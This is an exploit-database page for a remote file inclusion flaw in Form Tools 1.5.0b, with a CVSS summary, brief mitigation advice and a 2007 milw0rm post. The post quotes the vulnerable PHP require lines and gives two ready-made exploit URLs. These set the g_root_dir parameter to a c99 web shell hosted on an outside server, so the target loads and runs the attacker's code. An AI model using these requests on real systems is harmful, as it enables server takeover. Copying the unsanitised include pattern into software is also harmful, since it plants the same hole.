header-logo
Suggest Exploit
vendor:
Form Tools
by:
RoMaNcYxHaCkEr
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Form Tools
Affected Version From: 1.5.0b
Affected Version To: 1.5.0b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Form tools 1.5.0b Remote File Include

The vulnerability exists in the admin_page_open.php and client_page_open.php files in the Form Tools 1.5.0b software. The vulnerability allows an attacker to include remote files by manipulating the 'g_root_dir' parameter. By exploiting this vulnerability, an attacker can execute malicious code hosted on a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software or apply a security patch if available. Additionally, it is advised to validate and sanitize user-supplied input to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

# Name : Form tools 1.5.0b Remote File Include
# Download From : http://www.formtools.org/download.php
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In Files admin_page_open.php & client_page_open.php In Line 3 :
<?php
    require("$g_root_dir/global/templates/admin_nav.php");
    ?>
<?php
    require("$g_root_dir/global/templates/client_nav.php");
    ?>
 

# Exploit:
www.RxH.com/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://no-hack.fr/shells/c99.txt?
And Here
www.RxH.com/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://no-hack.fr/shells/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
H-T TeaM (no-hack.fr)
Str0ck
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-14]

Navigation

Suggest Exploit

Services By CQR